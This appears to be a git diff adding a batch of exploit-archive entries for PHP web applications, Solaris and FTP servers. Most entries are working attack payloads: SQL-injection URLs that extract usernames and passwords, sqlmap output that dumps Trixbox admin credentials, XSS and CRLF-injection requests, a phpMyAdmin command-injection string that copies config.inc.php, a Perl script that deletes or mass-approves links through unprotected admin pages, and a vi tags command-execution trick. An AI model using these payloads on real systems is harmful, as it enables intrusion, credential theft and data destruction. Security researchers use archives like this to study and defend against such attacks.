HTTP HEADER: Host: [Accelion web server] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv: 1.9.0.1) Gecko/2008070208 Firefox/3.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: https://[Accelion web server]/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM

SPAM_ATTACK

Content-Type: application/x-www-form-urlencoded Content-Length: 131 POST DATA: description=Could+you+please+close+this+tickets%0D%0A%0D%0ARegards&client_email=email_to_spam% 40victim_domain.com&submit=Soumettre+le+rapport \ No newline at end of file diff --git a/platforms/php/remote/32416.php b/platforms/php/remote/32416.php new file mode 100755 index 000000000..72d1dfbab --- /dev/null +++ b/platforms/php/remote/32416.php @@ -0,0 +1,19 @@ +source: http://www.securityfocus.com/bid/31398/info + +PHP is prone to a code-injection weakness because it fails to sufficiently sanitize input to 'create_function()'. Note that the anonymous function returned need not be called for the supplied code to be executed. + +An attacker who can exploit this weakness will be able to execute code with the privileges of an additional vulnerable program. + +This weakness is reported in PHP 5.2.6; other versions may also be affected. + + diff --git a/platforms/php/remote/32417.php b/platforms/php/remote/32417.php new file mode 100755 index 000000000..a0405f01a --- /dev/null +++ b/platforms/php/remote/32417.php @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/31398/info + +PHP is prone to a code-injection weakness because it fails to sufficiently sanitize input to 'create_function()'. Note that the anonymous function returned need not be called for the supplied code to be executed. + +An attacker who can exploit this weakness will be able to execute code with the privileges of an additional vulnerable program. + +This weakness is reported in PHP 5.2.6; other versions may also be affected. + + diff --git a/platforms/php/webapps/32239.txt b/platforms/php/webapps/32239.txt new file mode 100755 index 000000000..a275b4220 --- /dev/null +++ b/platforms/php/webapps/32239.txt @@ -0,0 +1,61 @@ +# Exploit Title: SQL injection in Trixbox All Versions +# Date: 13/03/2014 +# Exploit Author: Sc4nX +# Email : Sec744[at]yahoo.com - r1z[at]hackermail.com +# Software Link: http://trixbox.org/downloads +# Tested on: Linux / Win 7 + +Example : (Grab users / password hashes from ampusers)? + +root@sc4nx# python sqlmap.py -u http://localhost/web-meetme/conf_cdr.php?bookId=1 -D asterisk -T ampusers -C username,password --dump --level 4 --risk 4 --no-cast --threads 10 + +[*] starting at 07:53:52 + +[07:53:52] [INFO] resuming back-end DBMS 'mysql' +[07:53:52] [INFO] testing connection to the target URL +sqlmap identified the following injection points with a total of 0 HTTP(s) requests: +--- +Place: GET +Parameter: bookId +? ? Type: boolean-based blind +? ? Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) +? ? Payload: bookId=1' RLIKE (SELECT (CASE WHEN (2971=2971) THEN 1 ELSE 0x28 END)) AND 'AIdK'='AIdK + +? ? Type: AND/OR time-based blind +? ? Title: MySQL < 5.0.12 AND time-based blind (heavy query) +? ? Payload: bookId=1' AND 3086=BENCHMARK(5000000,MD5(0x454a5a64)) AND 'qjLM'='qjLM +--- +[07:53:52] [INFO] the back-end DBMS is MySQL +web server operating system: Linux CentOS 5.8 +web application technology: Apache 2.2.3, PHP 5.2.5 +back-end DBMS: MySQL 5 +[07:53:52] [INFO] fetching columns 'password, username' for table 'ampusers' in database 'asterisk' +[07:53:52] [INFO] resumed: 2 +[07:53:52] [INFO] retrieving the length of query output +[07:53:52] [INFO] resumed: 8 +[07:53:52] [INFO] resumed: username +[07:53:52] [INFO] retrieving the length of query output +[07:53:52] [INFO] resumed: 8 +[07:53:52] [INFO] resumed: password +[07:53:52] [INFO] fetching entries of column(s) 'password, username' for table 'ampusers' in database 'asterisk' +[07:53:52] [INFO] fetching number of column(s) 'password, username' entries for table 'ampusers' in database 'asterisk' +[07:53:52] [INFO] resumed: 1 +[07:53:52] [INFO] retrieving the length of query output +[07:53:52] [INFO] resumed: 8 +[07:53:52] [INFO] resumed: passw0rd +[07:53:52] [INFO] retrieving the length of query output +[07:53:52] [INFO] resumed: 5 +[07:53:52] [INFO] resumed: admin +[07:53:52] [INFO] analyzing table dump for possible password hashes +Database: asterisk +Table: ampusers +[1 entry] ++----------+----------+ +| username | password | ++----------+----------+ +| admin ? ?| passw0rd | ++----------+----------+ + +=================================================================================== +GZ : Dr.Hacker (Doksh) - CodeZero - All Memmbers Sec4ever.com? +The End :P \ No newline at end of file diff --git a/platforms/php/webapps/32375.txt b/platforms/php/webapps/32375.txt new file mode 100755 index 000000000..19356ca8d --- /dev/null +++ b/platforms/php/webapps/32375.txt @@ -0,0 +1,174 @@ +# Exploit Title: OXID eShop v<4.7.11/5.0.11 + v<4.8.4/5.1.4 Multiple Vulnerabilities +# Google Dork: - +# Date: 12/2013 +# Exploit Author: //sToRm +# Author mail: storm@sicherheit-online.org +# Vendor Homepage: http://www.oxid-esales.com +# Software Link: - +# Version: All versions < 4.7.11/5.0.11 + All versions < 4.8.4/5.1.4 +# Tested on: Multiple platforms +# CVE : CVE-2014-2016 + CVE-2014-2017 (reserved) + + +########################################################################################################### +# XSS vulnerability ####################################################################################### + +Under certain circumstances, an attacker can trick a user to enter a specially crafted +URI or click on a mal-formed link to exploit a cross-site scripting vulnerability that +theoretically can be used to gain unauthorized access to a user account or collect +sensitive information of this user. + +SAMPLE: ------------------------------------------------------------------------------- +http://HOST/tag/sample/sample-name.html?cur=2&listtype=tag&pgNr=2&searchtag=[XSS] +--------------------------------------------------------------------------------------- + +Products: + + OXID eShop Enterprise Edition + OXID eShop Professional Edition + OXID eShop Community Edition + +Releases: All previous releases +Platforms: All releases are affected on all platforms. + +STATE +- Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4. +- A fix for OXID eShop version 4.6.8 is available. + +Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-001 + +########################################################################################################### +########################################################################################################### + + + + + +########################################################################################################### +# Multiple CRLF injection / HTTP response splitting ####################################################### + +Under certain circumstances (depending on the browser, OS, PHP-Version), an attacker can trick a user to +enter a specially crafted URI or click on a mal-formed link to exploit a HTTP response splitting vulnerability +that theoretically can be used to poison cache, gain unauthorized access to a user account or collect +sensitive information of this user. + +A possible exploit by passing such a mal-formed URI could lead to: +- return of a blank page or a PHP error (depending on one's server configuration) +- set unsolicited browser cookies + +Products: + + OXID eShop Enterprise Edition + OXID eShop Professional Edition + OXID eShop Community Edition + +Releases: All previous releases +Platforms: All releases are affected on all platforms. + +STATE: +- Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4. +- A fix for OXID eShop version 4.6.8 is available. + +Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-002 + + +Vulnerability details: + +########################################################################################################### +# 1 # CRLF injection / HTTP response splitting ############################################################ + +PATH: ROOT/index.php +PARAMETER: anid + +CONCEPT: -------------------------------------------------------------------------------------------------- +actcontrol=start +&aid=1 +&am=1 +&anid=%0d%0a%20[INJECT:INJECT] +&cl=start +&fnc=tobasket +&lang=0 +&pgNr=0 +&stoken=1 +----------------------------------------------------------------------------------------------------------- + +SAMPLE: +--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------ +actcontrol=start&aid=1&am=1&anid=%0d%0a%20INJECTED:INJECTED_DATA&cl=start&fnc=tobasket&lang=0&pgNr=0&stoken=1 +----------------------------------------------------------------------------------------------------------- +########################################################################################################### +########################################################################################################### + + + + + +########################################################################################################### +# 2 # CRLF injection / HTTP response splitting ############################################################ + +PATH: ROOT/index.php +PARAMETER: cnid + +CONCEPT: -------------------------------------------------------------------------------------------------- +actcontrol=details +&aid=1 +&am=1 +&anid=0 +&cl=details +&cnid=%0d%0a%20[INJECTED:INJECTED] +&fnc=tobasket +&lang=0 +&listtype=list +&panid= +&parentid=1 +&stoken=1 +&varselid%5b0%5d= +----------------------------------------------------------------------------------------------------------- + +SAMPLE: +--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------ +actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=%0d%0a%20INJECTED:INJECTED_DATA&fnc=tobasket&lang=0&listtype=list&panid=&parentid=1&stoken=1&varselid%5b0%5d= +----------------------------------------------------------------------------------------------------------- +########################################################################################################### +########################################################################################################### + + + + + +########################################################################################################### +# 3 # CRLF injection / HTTP response splitting ############################################################ + +PATH: ROOT/index.php +PARAMETER: listtype + +CONCEPT: -------------------------------------------------------------------------------------------------- +actcontrol=details +&aid=1 +&am=1 +&anid=0 +&cl=details +&cnid=0 +&fnc=tobasket +&lang=0 +&listtype=%0d%0a%20[INJECTED:INJECTED] +&panid= +&parentid=0 +&stoken=0 +&varselid%5b0%5d= +----------------------------------------------------------------------------------------------------------- + +SAMPLE: +--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------ +actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=0&fnc=tobasket&lang=0&listtype=%0d%0a%20INJECTED:INJECTED_DATA&panid=&parentid=0&stoken=0&varselid%5b0%5d= +----------------------------------------------------------------------------------------------------------- +########################################################################################################### +########################################################################################################### + + + +Many greetings to all lunatics and freaks out there who live daily in the code like me and my partners. +A thanks to the developers who have responded relatively quickly. + +Cheers! +//sToRm diff --git a/platforms/php/webapps/32383.txt b/platforms/php/webapps/32383.txt new file mode 100755 index 000000000..f9b1dcb0c --- /dev/null +++ b/platforms/php/webapps/32383.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31188/info + +phpMyAdmin is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the application fails to adequately sanitize user-supplied input. + +Successful attacks can compromise the affected application and possibly the underlying computer. + +This issue affects versions prior to phpMyAdmin 2.11.9.1. + +http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token] \ No newline at end of file diff --git a/platforms/php/webapps/32387.txt b/platforms/php/webapps/32387.txt new file mode 100755 index 000000000..9cd9cd941 --- /dev/null +++ b/platforms/php/webapps/32387.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31210/info + +Quick.Cms.Lite is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Quick.Cms.Lite 2.1 is vulnerable; other versions may also be affected. + +http://www.example.com/admin.php?"><" \ No newline at end of file diff --git a/platforms/php/webapps/32388.txt b/platforms/php/webapps/32388.txt new file mode 100755 index 000000000..538c0eab2 --- /dev/null +++ b/platforms/php/webapps/32388.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31214/info + +The Cars & Vehicle script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +www.example.com/Script/page.php?lnkid=-1/**/UNION/**/SELECT/**/1,1,1,1,concat_ws(user(),version(),database()),1/* \ No newline at end of file diff --git a/platforms/php/webapps/32389.txt b/platforms/php/webapps/32389.txt new file mode 100755 index 000000000..e8f1940f6 --- /dev/null +++ b/platforms/php/webapps/32389.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31216/info + +Quick.Cart is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Quick.Cart 3.1 is vulnerable; other versions may also be affected. + +http://www.example.com/admin.php?"><" \ No newline at end of file diff --git a/platforms/php/webapps/32392.pl b/platforms/php/webapps/32392.pl new file mode 100755 index 000000000..0de21d0ed --- /dev/null +++ b/platforms/php/webapps/32392.pl @@ -0,0 +1,256 @@ +source: http://www.securityfocus.com/bid/31228/info + +Add a link is prone to multiple security vulnerabilities, including multiple security-bypass issues and an SQL-injection issue. + +Exploiting the security-bypass issues may allow an attacker to bypass certain security restrictions and perform unauthorized actions. The attacker can exploit the SQL-injection issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. This will compromise the application and may aid in further attacks. + +These issues affect Add a link 4 and prior versions. + +# addalink <= 4 Arbitrary Admin Access Vulnerability Exploit +# url: http://sourceforge.net/projects/addalink/ +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. +# +# Greetz To: All Hackers and milw0rm website + +#!/usr/bin/perl + +use HTTP::Request; +use LWP::UserAgent; + +print "Insert host/path:(ex: http://www.site.com/linkliste/)\n"; +$host=; +chomp $host; +print "\n"; + +# Si la url no tiene http: al principio + if ( $host !~ /^http:/ ) { + + # lo añadimos + $host = 'http://' . $host; +} + +# Si la url no tiene / al final + if ( $host !~ /\/$/ ) { + + # lo añadimos + $host = $host . '/'; +} + +print " Victim: $host \n\n"; + +menu:; + + + +print "Menu:\n"; + +print "\n"; + + + +print "1. Reset all counters\n"; + +print "2. Delete all links\n"; + +print "3. Approve all links\n"; + +print "4. Unapprove all links\n"; +print ""; +print "5. Exit\n\n"; + +print "Option:"; + +$opcion=; + + + +if ($opcion>=1 && $opcion<=5 ) + +{ + + + +if ($opcion==1) + +{ + +&Reset_all_counters + +} + +if ($opcion==2) + +{ + +&Delete_all_links + +} + +if ($opcion==3) + +{ + +&Approve_all_links + +} + +if ($opcion==4) + +{ + +&Unapprove_all_links + +} + +if ($opcion==5) + +{ + +exit(1); + +}} + +else +{ +print "Option incorrect\n"; + +goto menu; +} + +#### + +sub Reset_all_counters +{ + +$poc="admin/read_links.php?action=resetcounter"; + +$final="$host$poc"; +my $req=HTTP::Request->new(GET=>$final); +my $ua=LWP::UserAgent->new(); +$ua->timeout(30); +my $response=$ua->request($req); + +print "\n$final\n"; + +if ($response->is_success) { +print "[+] Reset all counters\n\n"; +} +else { +print "[-] Reset all counters\n\n"; +} + +print "\n"; + +print "Press enter to go to menu."; + +$volver=; + +goto menu; + +} + +### + +sub Delete_all_links +{ + +$poc="admin/read_links.php?action=deleteall"; + +$final="$host$poc"; +my $req=HTTP::Request->new(GET=>$final); +my $ua=LWP::UserAgent->new(); +$ua->timeout(30); +my $response=$ua->request($req); + +print "\n$final\n"; + +if ($response->is_success) { +print "[+] Delete all links\n\n"; +} +else { +print "[-] Delete all links\n\n"; +} + +print "\n"; + +print "Press enter to go to menu."; + +$volver=; + +goto menu; + +} + +### + +sub Approve_all_links +{ + +$poc="admin/read_links.php?action=approveall"; + +$final="$host$poc"; +my $req=HTTP::Request->new(GET=>$final); +my $ua=LWP::UserAgent->new(); +$ua->timeout(30); +my $response=$ua->request($req); + +print "\n$final\n"; + +if ($response->is_success) { +print "[+] Approve all links\n\n"; +} +else { +print "[-] Approve all links\n\n"; +} + +print "\n"; + +print "Press enter to go to menu."; + +$volver=; + +goto menu; + +} + +### + +sub Unapprove_all_links +{ + +$poc="admin/read_links.php?action=unapproveall"; + +$final="$host$poc"; +my $req=HTTP::Request->new(GET=>$final); +my $ua=LWP::UserAgent->new(); +$ua->timeout(30); +my $response=$ua->request($req); + +print "\n$final\n"; + +if ($response->is_success) { +print "[+] Unapprove all links\n\n"; +} +else { +print "[-] Unapprove all links\n\n"; +} + +print "\n"; + +print "Press enter to go to menu."; + +$volver=; + +goto menu; + +} + +# __EOF__ + diff --git a/platforms/php/webapps/32395.txt b/platforms/php/webapps/32395.txt new file mode 100755 index 000000000..c4cc54c8e --- /dev/null +++ b/platforms/php/webapps/32395.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31249/info + +HyperStop WebHost Directory is reported prone to an information-disclosure vulnerability. + +Successful exploits of this issue may allow an attacker to obtain sensitive information by downloading the full contents of the application's database. + +HyperStop WebHost Directory 1.2 is vulnerable; other versions may also be affected. + +http://www.example.com/admin/backup/db \ No newline at end of file diff --git a/platforms/php/webapps/32396.txt b/platforms/php/webapps/32396.txt new file mode 100755 index 000000000..37e1bfb82 --- /dev/null +++ b/platforms/php/webapps/32396.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/31256/info + +H-Sphere is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +H-Sphere 3.0.0 Patch 9 and 3.1 Patch 1 are vulnerable; other versions may also be affected. + +http://www.example.com/webshell4/login.php?err=[XSS] +http://www.example.com/webshell4/login.php?login=[XSS] + diff --git a/platforms/php/webapps/32397.txt b/platforms/php/webapps/32397.txt new file mode 100755 index 000000000..3640f9943 --- /dev/null +++ b/platforms/php/webapps/32397.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31263/info + +PHP Pro Bid is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +PHP Pro Bid 6.04 is vulnerable; other versions may also be affected. + +http://www.example.com/phpprobidlocation/categories.php?start=0&limit=20&parent_id=669&keywords_cat_search=&buyout_price=&reserve_price=&quantity=&enable_swap=&order_field=(select%201)x&order_type=%20 \ No newline at end of file diff --git a/platforms/php/webapps/32398.txt b/platforms/php/webapps/32398.txt new file mode 100755 index 000000000..bf7de558d --- /dev/null +++ b/platforms/php/webapps/32398.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31287/info + +Thyme is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +This issue affects Thyme 1.3; other versions may also be affected. + +http://www.example.com/thyme/modules/common_files/add_calendars.php?callback="/>'> \ No newline at end of file diff --git a/platforms/php/webapps/32405.txt b/platforms/php/webapps/32405.txt new file mode 100755 index 000000000..01d9b87e5 --- /dev/null +++ b/platforms/php/webapps/32405.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31313/info + +xt:Commerce is prone to multiple vulnerabilities, including a session-fixation vulnerability and a cross-site scripting vulnerability. + +An attacker can leverage the session-fixation issue to hijack a session of an unsuspecting user. The attacker can exploit the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +xt:Commerce 3.04 is vulnerable; other versions may also be affected. + +https://www.example.com/advanced_search_result.php?keywords=/>"&x=1&y=1 \ No newline at end of file diff --git a/platforms/php/webapps/32406.txt b/platforms/php/webapps/32406.txt new file mode 100755 index 000000000..e7f81ecc9 --- /dev/null +++ b/platforms/php/webapps/32406.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31313/info + +xt:Commerce is prone to multiple vulnerabilities, including a session-fixation vulnerability and a cross-site scripting vulnerability. + +An attacker can leverage the session-fixation issue to hijack a session of an unsuspecting user. The attacker can exploit the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +xt:Commerce 3.04 is vulnerable; other versions may also be affected. + +https://www.example.com/xtcommerce304/shopping_cart.php/XTCsid/15031988 \ No newline at end of file diff --git a/platforms/php/webapps/32407.txt b/platforms/php/webapps/32407.txt new file mode 100755 index 000000000..916ce4e58 --- /dev/null +++ b/platforms/php/webapps/32407.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31315/info + +BLUEPAGE CMS is prone to a session-fixation vulnerability. + +Attackers can exploit this issue to hijack a user's session and gain unauthorized access to the affected application. + +BLUEPAGE CMS 2.5 is vulnerable; other versions may also be affected. + +http://www.example.com/BluePageCMS/?PHPSESSID=15031988 \ No newline at end of file diff --git a/platforms/php/webapps/32408.txt b/platforms/php/webapps/32408.txt new file mode 100755 index 000000000..c608547ed --- /dev/null +++ b/platforms/php/webapps/32408.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31323/info + +BlueCUBE CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/tienda.php?id=-1+union+select+concat(version(),0x3a,database(),0x3a,user())/* \ No newline at end of file diff --git a/platforms/php/webapps/32409.txt b/platforms/php/webapps/32409.txt new file mode 100755 index 000000000..477909aa3 --- /dev/null +++ b/platforms/php/webapps/32409.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31326/info + +Achievo is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +This issue affects Achievo 1.3.2; other versions may also be affected. + +http://www.example.com/achievo-1.3.2/dispatch.php?atknodetype= >">a lert(document.cookie)%3B&atkaction=adminpim&atklevel=-1&atkprevlevel =0&achievo=cgvuu4c9nv45ofdq8ntv1inm82 \ No newline at end of file diff --git a/platforms/php/webapps/32410.txt b/platforms/php/webapps/32410.txt new file mode 100755 index 000000000..03f0295e1 --- /dev/null +++ b/platforms/php/webapps/32410.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31329/info + +6rbScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/cat.php?CatID=-1+union+select+1,concat(aid,0x3a,pwd,0x3a,email),3,4+from+7addad_authors-- \ No newline at end of file diff --git a/platforms/php/webapps/32411.txt b/platforms/php/webapps/32411.txt new file mode 100755 index 000000000..fb6d76a41 --- /dev/null +++ b/platforms/php/webapps/32411.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31335/info + +Datalife Engine CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Datalife Engine CMS 7.2 is vulnerable; other versions may also be affected. + +http://www.example.com/admin.php/%3E%22%3E%3CScRiPt%3Ealert('Hadi-Kiamarsi')%3C/ScRiPt%3E \ No newline at end of file diff --git a/platforms/php/webapps/32413.txt b/platforms/php/webapps/32413.txt new file mode 100755 index 000000000..8844ba9fe --- /dev/null +++ b/platforms/php/webapps/32413.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31350/info + +InterTech Web Content Management System (WCMS) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/etemplate.php?id=-5+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users-- \ No newline at end of file diff --git a/platforms/php/webapps/32415.txt b/platforms/php/webapps/32415.txt new file mode 100755 index 000000000..f064b312a --- /dev/null +++ b/platforms/php/webapps/32415.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/31384/info + +The Ajax Checklist module for Drupal is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +These issues affect versions prior to Ajax Checklist 5.x-1.1. + +http://www.example.com/ajaxchecklist/save/1/2%27,2),(3,3,(select%20pass%20f +rom%20users%20where%20uid=1),3),(4,4,%274/3/4 \ No newline at end of file diff --git a/platforms/solaris/remote/32393.txt b/platforms/solaris/remote/32393.txt new file mode 100755 index 000000000..37918e6fb --- /dev/null +++ b/platforms/solaris/remote/32393.txt @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/31229/info + +Sun Solaris text editors are prone to a command-execution vulnerability. + +An attacker may leverage this issue to execute arbitrary commands with the privileges of another user on the affected computer. + +Sun Solaris 8, 9, and 10 are affected. + +$ echo "This is line 1" > file1 +$ echo "file1line1file1:1|!touch gotcha" > tags +$ ls +file1 tags +$ vi -t file1line1 +:q! +$ ls +file1 gotcha tags +$ diff --git a/platforms/unix/remote/32399.txt b/platforms/unix/remote/32399.txt new file mode 100755 index 000000000..2aa2cb2f0 --- /dev/null +++ b/platforms/unix/remote/32399.txt @@ -0,0 +1,23 @@ +source: http://www.securityfocus.com/bid/31289/info + +FTP servers by multiple vendors are prone to a security vulnerability that allows attackers to perform cross-site request-forgery attacks. + +Successful exploits can run arbitrary FTP commands on the server in the context of an unsuspecting user's session. This may lead to further attacks. + +ftp://user@example.com//////////////////////////////////////////////// +////////////////////////////////////////////////////////////////////// +////////////////////////////////////////////////////////////////////// +////////////////////////////////////////////////////////////////////// +////////////////////////////////////////////////////////////////////// +////////////////////////////////////////////////////////////////////// +////////////////////////////////////////////////////////////////////// +/////////////////////////////////////syst + +ftp://ftp.example.com///////////////////////////////////////////////// +////////////////////////////////////////////////////////////////////// +////////////////////////////////////////////////////////////////////// +////////////////////////////////////////////////////////////////////// +////////////////////////////////////////////////////////////////////// +////////////////////////////////////////////////////////////////////// +////////////////////////////////////////////////////////////////////// +/////////////////////////////////////SITE%20CHMOD%20777%20EXAMPLEFILE \ No newline at end of file